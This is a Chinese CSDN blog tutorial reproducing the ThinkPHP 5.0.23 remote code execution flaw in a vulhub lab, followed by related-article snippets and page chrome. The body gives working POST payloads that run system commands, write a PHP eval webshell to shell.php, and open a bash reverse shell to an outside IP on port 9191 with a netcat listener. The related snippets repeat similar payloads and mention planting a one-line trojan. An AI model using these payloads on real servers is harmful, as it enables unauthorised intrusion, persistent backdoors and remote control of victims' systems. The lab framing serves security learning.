Thinkphp框架漏洞--->5.0.23 RCE

已于 2024-03-01 00:48:49 修改
阅读量1.3k 收藏 19
点赞数 31
文章标签: thinkphp 框架漏洞
于 2024-03-01 00:46:26 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huohaowen/article/details/136383962
版权

1.Thinkphp

ThinkPHP是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,是为了敏捷WEB应用开发和简化 企业应用开发而诞生的。

2.漏洞原理及成因

该漏洞出现的原因在于 ThinkPHP5框架底层对控制器名过滤不严 ,从而让攻击者可以通过url调用到ThinkPHP框 架内部的敏感函数,进而导致getshell漏洞  
对于适用的范围:     Thinkphp 5.0.x<= 5.0.23  

3.漏洞复现

首先要找到一个有漏洞的页面!!!

然后就可以用工具去fuzz亿下!!嘻嘻

 可以看见是能成功fuzz出来的!!!

于是就可以加以利用了,我们这里直接讲两种利用的方法

1.RCE(Remote Code Execute)

远程代码执行,那么我们肯定是要上poc啦,在上poc之前,我们要知道,这是一个因为参数覆盖导致的RCE!!!

那么我们需要去抓包!!!

 先将get包改成post

然后再去修改参数(首先确定是Windows版本的)可以看见页面上是返回了信息的

那么我们去ping的话应该也是可以的!!!

2.Getshell !!!

1.Windows版本

代码执行是你的谎言,getshell才是你的真相,直接上poc

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo+^<?php+@eval($_POST['cmd']);+?^>+>>shell.php

可以看见是能够成功的getshell的!!! 

2.Linux版本

我们也完全可以这样做,但是呢,可以讲一个新的方法

我就直接用vulhub的docker环境了

然后我们要来讲这样的一个命令

_method=__construct&filter[]=system&method=get&get[]=pwd

这个可以用来验证!!存在漏洞!!!!

然后讲一种新getshell的方法

●/bin/bash -c "bash -i >& /dev/tcp/192.168.43.1/9191 0>&1"

下面来解释一下这个命令

  1. /bin/bash 是要执行的 shell 程序的路径,-c 选项告诉 Bash shell 要执行后面的命令字符串。
  2. bash -i 是启动一个交互式的shell !!
  3. >& /dev/tcp/192.168.43.1/9191   将标准输出和标准错误重定向到指定的 TCP 连接 
  4. 0>&1 将标准输入重定向到标准输出,使得输入和输出都通过 TCP 连接

这意味着命令试图在目标主机上建立一个 TCP 连接,并将该连接与一个交互式的 Bash shell 关联起来,以便攻击者可以通过该连接执行命令并与目标系统进行交互。

然后,我们在在主机上开启监听,我这里用netcat!!(别问我端口为什么这么有特性

 编码之后发送即可!!

当然了,感觉这个shell还是没有直接写的webshell好用呢

对了还要补充一下那个编码的网址   在线url网址编码、解码器-BeJSON.comicon-default.png?t=N7T8https://www.bejson.com/enc/urlencode/

那么以上就是thinkphp的框架漏洞的基本原理以及复现啦

Whoami@127.0.0.1
关注
  • 31
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce
qq_51577576的博客
10-02 2054
[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
thinkphp5.0.23漏洞复现以及脚本编写
weixin_45653478的博客
04-26 776
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
thinkphp/5.0.23-rce漏洞复现
qq_46804551的博客
04-22 873
环境搭建 访问your-ip:8080 环境搭建成功 漏洞复现 thinkphp 5.0.23(完整版)debug模式 32、(post)public/index.php (data)_method=__construct&filter[]=system&server[REQUEST_METHOD]=touch%20/tmp/xxx thinkphp 5.0.23(完整版) 33、(post)public/index.php?s=captcha (data) _method=__co
buuctf [ThinkPHP]5.0.23-Rce
qq_1873822的博客
03-14 1139
poc POST /index.php?s=captcha HTTP/1.1 Host: yuorip Accept-Encoding: gzip, deflate Accept: / Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close Content-Type: application/x-www-form.
Thinkphp5.0.23-rce漏洞复现
qq_64875725的博客
06-02 2366
ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中,获取method的方法中没有正确处理方法名,导致攻击者可以调用Request类任意方法并构造利用链,从而导致远程代码执行漏洞。: 'GET';} elseif (!} else {
buuctf-Real-[ThinkPHP]5.0.23-Rce
weixin_46079186的博客
05-09 613
题目地址 和前两题一样,去找poc 找到poc ,使用查看一下效果有回显。 根据前两题经验,flag肯定在phpinfo 里面 ,所以直接修改一下,拿到flag
漏洞复现-thinkphp2-RCE+5.0.23-RCE+5-RCE远程代码执行漏洞
qq_59350385的博客
03-24 597
目录 一、2-RCE 漏洞详情 1.构造poc?s=/a/b/c/${phpinfo()} 2. 使用蚁剑连接地址为: 二、5-RCE 漏洞原因: 1,访问 三、5.0.23-RCE 漏洞原因 1.利用system函数远程命令执行,利用bp抓包,修改请求方式,使用poc进行攻击: 一、2-RCE 漏洞详情 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞 preg_replace(‘正则规则’,‘替换字符’,‘目标字符’) 如果目标字符存在符合正则规.
【vulhub】thinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现
qq_58873970的博客
09-07 365
----------------梦想,想像力和希望实现这些梦想的人的勇气充满希望。
vulhub系列之thinkphp(2-rce5.0.23-rce、5-rce、in-sqlinjection)
小城的博客
12-24 921
目录thinkphp 2-rce5.0.23远程代码执行 大家好,我是小城,一个刚刚起步的学渣,笨鸟先飞,可惜我领悟得太晚。但从现在开始,我会努力加油进取变强! thinkphp 2-rce 0x01 漏洞原理 ThinkPHP 2.x版本中,使用preg_replace的/e模式匹配路由: $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)
ThinkPHP6.0.0---TP6.0.5框架
10-29
该TP包是通过composer下载,包里含有ThinkPHP6.0.0---ThinkPHP6.0.5各版本
thinkphp-bjyblog 开源博客系统 v1.1
10-11
闲暇之时使用thinkphp开发了一个个人博客用来整理技能知识; 如今博客的功能基本已经齐备;特开源以供各类猿们使用; 亦可以作为初学thinkphp的同学们的参考源代码; 此博客程序
Thinkphp开发--集成极光推送
10-19
极光推送(JPush)是独立的第三方云推送平台,致力于为全球移动应用开发者提供专业、高效的移动消息推送服务。本文讲述如何在将极光推送合到ThinkPHP框架中,
thinkphp-log-analyse:ThinkPHP日志分析
05-07
thinkphp-log-read 主界面 查询结果 自定义匹配 如果默认匹配账号密码不能满足,可以使用自定义匹配 注意:需要正则 自定义匹配结果
thinkphp5.0.23rce复现
Cwillchris的博客
03-13 526
5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。从图中可以看出,docker0网卡发生了错误,并且没有常见的IPV4,这里基本可以确定是docker的网络出现了问题 , 可以通过重置docker网络解决。可以发现docker的网卡正常了,并且通过物理机访问docker容器中的应用也已经正常。这样就掌握了漏洞利用的完整过程。启动环境,启动环境会先拉取镜像,网络不好可能会拉取不下来的。
debugpy-1.0.0b7-cp36-cp36m-macosx_10_13_x86_64.whl
最新发布
05-29
Python库是一组预先编写的代码模块,旨在帮助开发者实现特定的编程任务,无需从零开始编写代码。这些库可以包括各种功能,如数学运算、文件操作、数据分析和网络编程等。Python社区提供了大量的第三方库,如NumPy、Pandas和Requests,极大地丰富了Python的应用领域,从数据科学到Web开发。Python库的丰富性是Python成为最受欢迎的编程语言之一的关键原因之一。这些库不仅为初学者提供了快速入门的途径,而且为经验丰富的开发者提供了强大的工具,以高效率、高质量地完成复杂任务。例如,Matplotlib和Seaborn库在数据可视化领域内非常受欢迎,它们提供了广泛的工具和技术,可以创建高度定制化的图表和图形,帮助数据科学家和分析师在数据探索和结果展示中更有效地传达信息。
zlib1.3.1动态库及静态库
05-29
使用VS2022编译的zlib1.3.1动态库及静态库
scratch2源码梦幻小画板
05-29
scratch2源码梦幻小画板提取方式是百度网盘分享地址
thinkphp5.0.23rce漏洞复现
09-22
ThinkPHP 5.0.23版本之前存在一个远程代码执行(RCE)的漏洞漏洞的形成原因是在获取method的方法中未正确处理方法名,导致攻击者可以调用Request类的任意方法并构造利用链,从而导致远程代码执行漏洞。具体的漏洞利用过程如下: 1. 访问靶机地址和端口号,进入首页。 2. 使用Burp抓包工具修改传参方式为POST,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd",其中pwd是系统执行命令的参数。 3. 接着进行漏洞的复现过程,首先在Kali docker容器中启动此漏洞环境。 4. 使用浏览器访问Kali的IP地址接上8080端口。 5. 再次使用Burp抓包工具,修改传参方式为POST,URL后接入/index.php?s=captch,传入参数为"_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=pwd"。 6. 点击Burp中的Go按钮,尝试写入phpinfo。 7. 成功后,写入一句话木马,密码为aaa。 8. 进一步操作,可以上蚁剑。 漏洞复现成功后,您可以参考这篇文章了解更多细节:[https://www.cnblogs.com/zenb/p/14537240.html](https://www.cnblogs.com/zenb/p/14537240.html)。如果您对此漏洞有更多疑问,欢迎提出。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值